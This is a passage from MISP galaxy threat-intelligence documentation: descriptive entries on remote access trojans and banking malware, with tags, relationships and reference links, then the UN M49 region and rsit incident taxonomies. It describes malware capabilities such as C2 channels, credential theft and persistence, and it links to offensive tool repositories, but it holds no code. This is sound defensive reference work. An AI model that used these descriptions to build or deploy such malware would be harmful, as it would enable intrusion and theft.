The purpose of the Client Maximus malware is financial fraud. As such, its code aspires to create the capabilities that most banking Trojans have, which allow attackers to monitor victims’ web navigation and interrupt online banking sessions at will. After taking over a victim’s banking session, an attacker operating this malware can initiate a fraudulent transaction from the account and use social engineering screens to manipulate the unwitting victim into authorizing it.

The tag is: misp-galaxy:rat="Client Maximus"

Client Maximus has relationships with:

  • similar: misp-galaxy:malpedia="Client Maximus" with estimative-language:likelihood-probability="likely"

Table 8785. Table References

Links

https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/

TheFat RAT

TheFatRat, a massive exploiting tool revealed: an easy tool to generate backdoors and an easy tool for post-exploitation attacks such as browser attacks and DLL attacks. This tool compiles malware with a popular payload, and the compiled malware can then be executed on Windows, Android and Mac. The malware created with this tool also has the ability to bypass most…

The tag is: misp-galaxy:rat="TheFat RAT"

Table 8786. Table References

Links

https://github.com/Screetsec/TheFatRat

RedLeaves

Since around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by malware ‘RedLeaves’. It is a new type of malware which has been observed since 2016 in attachments to targeted emails.

The tag is: misp-galaxy:rat="RedLeaves"

RedLeaves has relationships with:

  • similar: misp-galaxy:mitre-malware="RedLeaves - S0153" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="BUGJUICE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="likely"

Table 8787. Table References

Links

http://blog.jpcert.or.jp/2017/04/redleaves---malware-based-on-open-source-rat.html

Rurktar

Dubbed Rurktar, the tool hasn’t had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers users, and steal or upload files.

The tag is: misp-galaxy:rat="Rurktar"

Rurktar has relationships with:

  • similar: misp-galaxy:malpedia="Rurktar" with estimative-language:likelihood-probability="likely"

Table 8788. Table References

Links

http://www.securityweek.com/rurktar-malware-espionage-tool-development

RATAttack

RATAttack is a remote access trojan (RAT) that uses the Telegram protocol to support encrypted communication between the victim’s machine and the attacker. The Telegram protocol also provides a simple method to communicate to the target, negating the need for port forwarding. Before using RATAttack, the attacker must create a Telegram bot and embed the bot’s Telegram token into the trojan’s configuration file. When a system is infected with RATAttack, it connects to the bot’s Telegram channel. The attacker can then connect to the same channel and manage the RATAttack clients on the infected host machines. The trojan’s code was available on GitHub then was taken down by the author on April 19, 2017.

The tag is: misp-galaxy:rat="RATAttack"

Table 8789. Table References

Links

https://www.cyber.nj.gov/threat-profiles/trojan-variants/ratattack

KhRAT

So called because the Command and Control (C2) infrastructure from previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forcepoint, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors with typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.

The tag is: misp-galaxy:rat="KhRAT"

Table 8790. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/

RevCode

The tag is: misp-galaxy:rat="RevCode"

Table 8791. Table References

Links

https://revcode.eu/

AhNyth Android

Android Remote Administration Tool

The tag is: misp-galaxy:rat="AhNyth Android"

Table 8792. Table References

Links

https://github.com/AhMyth/AhMyth-Android-RAT

Socket23

SOCKET23 was launched from his web site and immediately infected major French corporations between August and October 1998. The virus (distributing the Trojan) was known as W32/HLLP.DeTroie.A (alias W32/Cheval.TCV). Never had a virus so disrupted French industry. The author quickly offered his own remover and made his apologies on his web site (now suppressed). Jean-Christophe X (18) was arrested on Tuesday 15 June 1999 in the Paris area and placed under judicial investigation for ‘fraudulent intrusion of data in a data processing system, suppression and fraudulent modification of data’.

The tag is: misp-galaxy:rat="Socket23"

Table 8793. Table References

Links

https://www.virusbulletin.com/uploads/pdf/magazine/1999/199908.pdf

PowerRAT

The tag is: misp-galaxy:rat="PowerRAT"

MacSpy

Standard macOS backdoor, offered via a 'malware-as-a-service' model. MacSpy is advertised as the "most sophisticated Mac spyware ever", with the low starting price of free. While the idea of malware-as-a-service (MaaS) isn’t a new one, with players such as Tox and Shark in the game, it can be said that MacSpy is one of the first seen for the OS X platform.

The tag is: misp-galaxy:rat="MacSpy"

MacSpy has relationships with:

  • similar: misp-galaxy:malpedia="MacSpy" with estimative-language:likelihood-probability="likely"

Table 8794. Table References

Links

https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service

https://objective-see.com/blog/blog_0x25.html

DNSMessenger

Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT. The use of multiple stages of PowerShell, with various stages being completely fileless, indicates an attacker who has taken significant measures to avoid detection.

The tag is: misp-galaxy:rat="DNSMessenger"

DNSMessenger has relationships with:

  • similar: misp-galaxy:mitre-malware="TEXTMATE - S0146" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="POWERSOURCE - S0145" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

Table 8795. Table References

Links

http://blog.talosintelligence.com/2017/03/dnsmessenger.html

PentagonRAT

The tag is: misp-galaxy:rat="PentagonRAT"

Table 8796. Table References

Links

http://pentagon-rat.blogspot.fr/

NewCore

NewCore is a remote access trojan first discovered by Fortinet researchers while conducting analysis on a China-linked APT campaign targeting Vietnamese organizations. The trojan is a DLL file, executed after a trojan downloader is installed on the targeted machine. Based on strings in the code, the trojan may be compiled from the publicly-available source code of the PcClient and PcCortr backdoor trojans.

The tag is: misp-galaxy:rat="NewCore"

Table 8797. Table References

Links

https://www.cyber.nj.gov/threat-profiles/trojan-variants/newcore

https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations

Deeper RAT

The tag is: misp-galaxy:rat="Deeper RAT"

Xyligan

The tag is: misp-galaxy:rat="Xyligan"

H-w0rm

The tag is: misp-galaxy:rat="H-w0rm"

htpRAT

On November 8, 2016 a non-disclosed entity in Laos was spear-phished by a group closely related to known Chinese adversaries and most likely affiliated with the Chinese government. The attackers utilized a new kind of Remote Access Trojan (RAT) that has not been previously observed or reported. The new RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming. htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in the Chinese adversary’s arsenal in a campaign against the Association of Southeast Asian Nations (ASEAN). Most RATs can log keystrokes, take screenshots, record audio and video from a webcam or microphone, install and uninstall programs and manage files. They support a fixed set of commands operators can execute using different command IDs (‘file download’ or ‘file upload,’ for example) and must be completely rebuilt to have different functionality. htpRAT, on the other hand, serves as a conduit for operators to do their job with greater precision and effect. On the Command and Control (C2) server side, threat actors can build new functionality in commands, which can be sent to the malware to execute. This capability makes htpRAT a small, agile, and incredibly dynamic piece of malware. Operators can change functionality, such as searching for a different file on the victim’s network, simply by wrapping commands.

The tag is: misp-galaxy:rat="htpRAT"

htpRAT has relationships with:

  • similar: misp-galaxy:malpedia="htpRAT" with estimative-language:likelihood-probability="likely"

Table 8798. Table References

Links

https://cdn.riskiq.com/wp-content/uploads/2017/10/RiskIQ-htpRAT-Malware-Attacks.pdf?_ga=2.159415805.1155855406.1509033001-1017609577.1507615928

FALLCHILL

According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.

The tag is: misp-galaxy:rat="FALLCHILL"

FALLCHILL has relationships with:

  • similar: misp-galaxy:mitre-malware="FALLCHILL - S0181" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"

Table 8799. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-318A

https://securelist.com/operation-applejeus/87553/

UBoatRAT

Palo Alto Networks Unit 42 has identified attacks with a new custom Remote Access Trojan (RAT) called UBoatRAT. The initial version of the RAT, found in May of 2017, was a simple HTTP backdoor that uses a public blog service in Hong Kong and a compromised web server in Japan for command and control. The developer soon added various new features to the code and released an updated version in June. The attacks with the latest variants we found in September have the following characteristics:

  • Targets personnel or organizations related to South Korea or the video games industry

  • Distributes malware through Google Drive

  • Obtains C2 address from GitHub

  • Uses Microsoft Windows Background Intelligent Transfer Service (BITS) to maintain persistence

The tag is: misp-galaxy:rat="UBoatRAT"

Table 8800. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

CrossRat

The EFF/Lookout report describes CrossRat as a “newly discovered desktop surveillanceware tool…which is able to target Windows, OSX, and Linux.”

The tag is: misp-galaxy:rat="CrossRat"

Table 8801. Table References

Links

https://digitasecurity.com/blog/2018/01/23/crossrat/

TSCookieRAT

TSCookie provides parameters such as C&C server information when loading TSCookieRAT. Upon execution, information about the infected host is sent with an HTTP POST request to an external server. (The HTTP header format is the same as TSCookie.) The data is RC4-encrypted from the beginning to 0x14 (the key is the Date header value), which is followed by the information about the infected host (host name, user name, OS version, etc.). Please refer to Appendix C, Table C-1 for the data format.

The tag is: misp-galaxy:rat="TSCookieRAT"

Table 8802. Table References

Links

http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html

Coldroot

Coldroot, a remote access trojan (RAT), is still undetectable by most antivirus engines, despite being uploaded and freely available on GitHub for almost two years. The RAT appears to have been created as a joke, "to Play with Mac users," and "give Mac it’s rights in this [the RAT] field," but has since expanded to work on all three major desktop operating systems (Linux, macOS, and Windows), according to a screenshot of its builder extracted from a promotional YouTube video.

The tag is: misp-galaxy:rat="Coldroot"

Table 8803. Table References

Links

https://www.bleepingcomputer.com/news/security/coldroot-rat-still-undetectable-despite-being-uploaded-on-github-two-years-ago/

https://github.com/xlinshan/Coldroot

Comnie

Comnie is a RAT originally identified by Sophos. It has been using GitHub, Tumblr and Blogspot as covert channels for its C2 communications. Comnie has been observed targeting government, defense, aerospace, high-tech and telecommunication sectors in Asia.

The tag is: misp-galaxy:rat="Comnie"

Table 8804. Table References

Links

https://exchange.xforce.ibmcloud.com/collection/East-Asia-Organizations-Victims-of-Comnie-Attack-12749a9dbc20e2f40b3ae99c43416d8c

https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/

GravityRAT

GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We’ve seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor.

The tag is: misp-galaxy:rat="GravityRAT"

Table 8805. Table References

Links

https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

ARS VBS Loader

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim’s machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious "loaders".

The tag is: misp-galaxy:rat="ARS VBS Loader"

ARS VBS Loader has relationships with:

  • similar: misp-galaxy:malpedia="ARS VBS Loader" with estimative-language:likelihood-probability="likely"

Table 8806. Table References

Links

https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/

RadRAT

RadRAT’s capabilities include: unfettered control of the compromised computer, lateral movement across the organization (Mimikatz-like credential harvesting, NTLM hash harvesting from the Windows registry and implementation of the Pass-the-Hash attack on SMB connections) and rootkit-like detection-evasion mechanisms.

The tag is: misp-galaxy:rat="RadRAT"

RadRAT has relationships with:

  • similar: misp-galaxy:malpedia="RadRAT" with estimative-language:likelihood-probability="likely"

Table 8807. Table References

Links

https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/

https://labs.bitdefender.com/wp-content/uploads/downloads/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/

FlawedAmmyy

FlawedAmmyy has been used since the beginning of 2016 in both highly targeted email attacks as well as massive, multi-million message campaigns. The RAT is based on leaked source code for Version 3 of the Ammyy Admin remote desktop software. As such, FlawedAmmyy contains the functionality of the leaked version, including: Remote Desktop control, File system manager, Proxy support, Audio Chat.

The tag is: misp-galaxy:rat="FlawedAmmyy"

FlawedAmmyy has relationships with:

  • similar: misp-galaxy:malpedia="FlawedAmmyy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Truebot" with estimative-language:likelihood-probability="likely"

Table 8808. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat

Spymaster Pro

Monitoring Software

The tag is: misp-galaxy:rat="Spymaster Pro"

Table 8809. Table References

Links

https://www.spymasterpro.com/

https://spycellphone.mobi/reviews/spymaster-pro-real-review-with-screenshots

NavRAT

Classic RAT that can download, upload, execute commands on the victim host and perform keylogging. However, the command and control (C2) infrastructure is very specific. It uses the legitimate Naver email platform in order to communicate with the attackers via email.

The tag is: misp-galaxy:rat="NavRAT"

NavRAT has relationships with:

  • similar: misp-galaxy:malpedia="NavRAT" with estimative-language:likelihood-probability="likely"

Table 8810. Table References

Links

https://blog.talosintelligence.com/2018/05/navrat.html

joanap

Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device.

The tag is: misp-galaxy:rat="joanap"

Table 8811. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-149A

Sisfader

Sisfader maintains persistence by installing itself as a system service. It is made up of multiple components ([1] Dropper: installs the malware; [2] Agent: main code of the RAT; [3] Config: written to the registry; [4] Auto Loader: responsible for extracting the Agent and the Config from the registry) and it has its own custom protocol for communication.

The tag is: misp-galaxy:rat="Sisfader"

Sisfader has relationships with:

  • similar: misp-galaxy:malpedia="Sisfader" with estimative-language:likelihood-probability="likely"

Table 8812. Table References

Links

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/

SocketPlayer

The RAT is written in .NET and uses socket.io for communication. Currently there are two variants of the malware: the 1st variant is a typical downloader, whereas the 2nd one has download and C2 functionalities.

The tag is: misp-galaxy:rat="SocketPlayer"

Table 8813. Table References

Links

https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_SocketPlayer_Analysis.pdf

https://volon.io/2018/06/targeted-attack-on-indian-defense-officials-using-socketplayer-malware/

Hallaj PRO RAT

RAT

The tag is: misp-galaxy:rat="Hallaj PRO RAT"

Table 8814. Table References

Links

https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/

TheOneSpy

Remotely monitor and control any wrong activity of kids on all smartphones & computers

The tag is: misp-galaxy:rat="TheOneSpy"

Table 8816. Table References

Links

https://www.theonespy.com/

BONDUPDATER

BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization. The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.

The tag is: misp-galaxy:rat="BONDUPDATER"

Table 8817. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

FlawedGrace

Proofpoint also points out that FlawedGrace is a full-featured RAT written in C++ and that it is a very large program that makes "extensive use of object-oriented and multithreaded programming techniques." As a consequence, getting familiar with its internal structure takes a lot of time and is far from a simple task.

The tag is: misp-galaxy:rat="FlawedGrace"

Table 8818. Table References

Links

https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/

H-worm

H-worm is a VBS (Visual Basic Script) based RAT written by an individual going by the name Houdini. We believe the author is based in Algeria and has connections to njq8, the author of njw0rm [1] and njRAT/LV [2], through means of a shared or common code base. We have seen the H-worm RAT being employed in targeted attacks against the international energy industry; however, we also see it being employed in a wider context in run-of-the-mill attacks through spammed email attachments and malicious links.

The tag is: misp-galaxy:rat="H-worm"

H-worm is also known as:

  • WSHRat

  • Houdini

  • Dunihi

H-worm has relationships with:

  • similar: misp-galaxy:tool="Hworm" with estimative-language:likelihood-probability="likely"

Table 8819. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

Parasite-HTTP-RAT

The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections. The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.

The tag is: misp-galaxy:rat="Parasite-HTTP-RAT"

Parasite-HTTP-RAT is also known as:

  • Parasite HTTP

Table 8820. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks

Caesar RAT

Caesar is an HTTP-based RAT that allows you to remotely control devices directly from your browser.

The tag is: misp-galaxy:rat="Caesar RAT"

Table 8821. Table References

Links

https://securityonline.info/caesarrat-http-based-rat/

FlawedAmmy

During the month of October, Check Point researchers discovered a widespread malware campaign spreading a remote access trojan (dubbed “FlawedAmmy”) that allows attackers to take over victims’ computers and data. The campaign was the latest and most widespread delivering the ‘FlawedAmmyy’ RAT, following a number of campaigns that have spread this malware in recent months. The Trojan allows attackers to gain full access to the machine’s camera and microphone, collect screen grabs, steal credentials and sensitive files, and intrusively monitor the victims’ actions. As a result, FlawedAmmy is the first RAT to enter the Global Threat Index’s top 10 ranking.

The tag is: misp-galaxy:rat="FlawedAmmy"

Table 8822. Table References

Links

https://www.helpnetsecurity.com/2018/11/14/flawedammy-most-wanted-malware-list/

Felipe

The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim’s debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.

The tag is: misp-galaxy:rat="Felipe"

Table 8823. Table References

Links

https://www.zscaler.com/blogs/research/felipe-new-infostealer-trojan

Amavaldo Banking Trojan

Amavaldo is a banking trojan written in Delphi and known to target Spanish- or Portuguese-speaking countries. It contains backdoor functionality and can operate in multiple stages. Amavaldo also abuses legitimate tools and software.

The tag is: misp-galaxy:rat="Amavaldo Banking Trojan"

Table 8824. Table References

Links

https://www.welivesecurity.com/2019/08/01/banking-trojans-amavaldo/

AsyncRAT

Open-Source Remote Administration Tool For Windows C# (RAT)

The tag is: misp-galaxy:rat="AsyncRAT"

Table 8825. Table References

Links

https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

InnfiRAT

InnfiRAT is a new RAT written in .NET and designed to perform specific tasks from an infected machine.

The tag is: misp-galaxy:rat="InnfiRAT"

Table 8826. Table References

Links

https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more

KeyBase

In the wild since February 2015. The malware comes equipped with a variety of features and can be purchased for $50 directly from the author. It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.

The tag is: misp-galaxy:rat="KeyBase"

Table 8827. Table References

Links

https://researchcenter.paloaltonetworks.com/2015/06/keybase-keylogger-malware-family-exposed/

Warzone

Apparently existing since 2018.

The tag is: misp-galaxy:rat="Warzone"

Table 8828. Table References

Links

https://warzone.pw

SDBbot

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence. SDBbot is composed of three pieces: an installer, a loader, and a RAT component.

The tag is: misp-galaxy:rat="SDBbot"

SDBbot is also known as:

  • SDB bot

Table 8829. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

Sepulcher

A China-based APT has been sending organizations spear-phishing emails that distribute a never-before-seen intelligence-collecting RAT dubbed Sepulcher.

Researchers discovered the new malware being distributed over the past six months through two separate campaigns. The first, in March, targeted European diplomatic and legislative bodies, non-profit policy research organizations and global organizations dealing with economic affairs. The second, in July, targeted Tibetan dissidents. They tied the campaigns to APT group TA413, which researchers say has been associated with Chinese state interests and is known for targeting the Tibetan community.

“Based on the use of publicly known sender addresses associated with Tibetan dissident targeting and the delivery of Sepulcher malware payloads, [we] have attributed both campaigns to the APT actor TA413,” said Proofpoint researchers in a Wednesday analysis. “The usage of publicly known Tibetan-themed sender accounts to deliver Sepulcher malware demonstrates a short-term realignment of TA413’s targets of interest.”

The tag is: misp-galaxy:rat="Sepulcher"

Table 8830. Table References

Links

https://www.enigmasoftware.fr/logicielmalveillantsepulcher-supprimer/

https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/

https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher

https://cyware.com/news/chinese-apt-ta413-found-distributing-sepulcher-malware-176a0969

Guildma

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages containing a ZIP archive attachment with a malicious LNK file. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool and silently downloads a malicious XSL file. The XSL file downloads all of Guildma’s modules and executes a first stage loader, which loads the rest of the modules. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening a webpage of one of the targeted banks.

The tag is: misp-galaxy:rat="Guildma"

Guildma is also known as:

  • Astaroth

Table 8831. Table References

Links

https://www.securityweek.com/guildma-malware-expands-targets-beyond-brazil

https://www.securityweek.com/extensive-living-land-hides-stealthy-malware-campaign

https://isc.sans.edu/diary/rss/28962

https://otx.alienvault.com/pulse/6303804723bccc7e3caad737

Milan

Milan is a 32-bit RAT written in Visual C++ and .NET. Milan is loaded and persists using tasks. An encoded routine waits for three to four seconds between executing the first task, deleting this task, and setting a second scheduled task for persistence.

The tag is: misp-galaxy:rat="Milan"

Milan is also known as:

  • James

Table 8832. Table References

Links

https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/

DarkWatchman

In late November, Prevailion’s Adversarial Counterintelligence Team (PACT) identified what appeared to be a malicious javascript-based Remote Access Trojan (RAT) that uses a robust Domain Generation Algorithm (DGA) to identify its Command and Control (C2) infrastructure and that utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation. This RAT, which PACT refers to by its internal codename “DarkWatchman”, has been observed being distributed by email and represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools. PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor’s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report.

The tag is: misp-galaxy:rat="DarkWatchman"

Table 8833. Table References

Links

https://www.prevailion.com/darkwatchman-new-fileness-techniques/

Ragnatela

Malwarebytes Lab identified a new variant of the BADNEWS RAT called Ragnatela. It is being distributed via spear phishing emails to targets of interest in Pakistan. Ragnatela, which means spider web in Italian, is also the project name and panel used by Patchwork APT. Ironically, the threat actor infected themselves with their own RAT.

The tag is: misp-galaxy:rat="Ragnatela"

Ragnatela has relationships with:

  • similar: misp-galaxy:mitre-malware="BADNEWS - S0128" with estimative-language:likelihood-probability="likely"

Table 8834. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/

STRRAT

STRRAT is a Java-based RAT with a JavaScript wrapper/dropper that was discovered in 2020. Its core payload (a .JAR file) is contained under several layers of obfuscation and encoding inside the JavaScript wrapper/dropper.

STRRAT is propagated by malicious email attachments. Its capabilities include standard RAT functionalities (remote access, remote command execution), browser and email-client credential harvesting, and a unique ransomware-like functionality – if instructed, it will add a “.crimson” extension to files on the device, rendering them inoperable (though they can be easily recovered because their content is not modified).

Unlike many Java-based malware families, STRRAT does not require Java to be installed on the infected system in order to operate. When the JavaScript wrapper/dropper is executed, if a suitable Java runtime installation is not found, one will be downloaded and installed in order to ensure the contained Java payload can execute.

The tag is: misp-galaxy:rat="STRRAT"

Table 8835. Table References

Links

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

COATHANGER

Chinese FortiGate RAT. The COATHANGER malware is a remote access trojan (RAT) designed specifically for FortiGate appliances. It is used as second-stage malware, and does not exploit a new vulnerability. Intelligence services MIVD & AIVD refer to the malware as COATHANGER based on a string present in the code.

The COATHANGER malware is stealthy and persistent. It hides itself by hooking system calls that could reveal its presence. It survives reboots and firmware upgrades.

MIVD & AIVD assess with high confidence that the malicious activity was conducted by a state-sponsored actor from the People’s Republic of China. This is part of a wider trend of Chinese political espionage against the Netherlands and its allies.

MIVD & AIVD assess that use of COATHANGER may be relatively targeted. The Chinese threat actor(s) scan for vulnerable edge devices at scale and gain access opportunistically, and likely introduce COATHANGER as a communication channel for select victims.

The tag is: misp-galaxy:rat="COATHANGER"

Table 8836. Table References

Links

https://github.com/JSCU-NL/COATHANGER

https://www.ncsc.nl/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coathanger-tlp-clear

https://twitter.com/sehof/status/1754883344574103670

Regions UN M49

Regions based on UN M49.

Regions UN M49 is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown

001 - World

The tag is: misp-galaxy:region="001 - World"

002 - Africa

The tag is: misp-galaxy:region="002 - Africa"

005 - South America

The tag is: misp-galaxy:region="005 - South America"

009 - Oceania

The tag is: misp-galaxy:region="009 - Oceania"

010 - Antarctica

The tag is: misp-galaxy:region="010 - Antarctica"

011 - Western Africa

The tag is: misp-galaxy:region="011 - Western Africa"

013 - Central America

The tag is: misp-galaxy:region="013 - Central America"

014 - Eastern Africa

The tag is: misp-galaxy:region="014 - Eastern Africa"

015 - Northern Africa

The tag is: misp-galaxy:region="015 - Northern Africa"

017 - Middle Africa

The tag is: misp-galaxy:region="017 - Middle Africa"

018 - Southern Africa

The tag is: misp-galaxy:region="018 - Southern Africa"

019 - Americas

The tag is: misp-galaxy:region="019 - Americas"

021 - Northern America

The tag is: misp-galaxy:region="021 - Northern America"

029 - Caribbean

The tag is: misp-galaxy:region="029 - Caribbean"

030 - Eastern Asia

The tag is: misp-galaxy:region="030 - Eastern Asia"

034 - Southern Asia

The tag is: misp-galaxy:region="034 - Southern Asia"

035 - South-eastern Asia

The tag is: misp-galaxy:region="035 - South-eastern Asia"

039 - Southern Europe

The tag is: misp-galaxy:region="039 - Southern Europe"

053 - Australia and New Zealand

The tag is: misp-galaxy:region="053 - Australia and New Zealand"

054 - Melanesia

The tag is: misp-galaxy:region="054 - Melanesia"

057 - Micronesia

The tag is: misp-galaxy:region="057 - Micronesia"

061 - Polynesia

The tag is: misp-galaxy:region="061 - Polynesia"

142 - Asia

The tag is: misp-galaxy:region="142 - Asia"

143 - Central Asia

The tag is: misp-galaxy:region="143 - Central Asia"

145 - Western Asia

The tag is: misp-galaxy:region="145 - Western Asia"

150 - Europe

The tag is: misp-galaxy:region="150 - Europe"

151 - Eastern Europe

The tag is: misp-galaxy:region="151 - Eastern Europe"

154 - Northern Europe

The tag is: misp-galaxy:region="154 - Northern Europe"

155 - Western Europe

The tag is: misp-galaxy:region="155 - Western Europe"

202 - Sub-Saharan Africa

The tag is: misp-galaxy:region="202 - Sub-Saharan Africa"

419 - Latin America and the Caribbean

The tag is: misp-galaxy:region="419 - Latin America and the Caribbean"

830 - Channel Islands

The tag is: misp-galaxy:region="830 - Channel Islands"

rsit

rsit.

rsit is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Koen Van Impe

Abusive Content:Spam

Or 'Unsolicited Bulk Email': this means that the recipient has not granted verifiable permission for the message to be sent and that the message is sent as part of a larger collection of messages, all having functionally comparable content. This IOC refers to resources which make up a SPAM infrastructure, be it harvesters, address verification services, URLs in spam e-mails, etc.

The tag is: misp-galaxy:rsit="Abusive Content:Spam"

Abusive Content:Spam has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Abusive Content:Harmful Speech

Discreditation or discrimination of somebody, e.g. cyber stalking, racism or threats against one or more individuals.

The tag is: misp-galaxy:rsit="Abusive Content:Harmful Speech"

Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content

Child Sexual Exploitation (CSE), Sexual content, glorification of violence, etc.

The tag is: misp-galaxy:rsit="Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content"

Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Malicious Code:Infected System

System infected with malware, e.g. PC, smartphone or server infected with a rootkit. Most often this refers to a connection to a sinkholed C2 server.

The tag is: misp-galaxy:rsit="Malicious Code:Infected System"

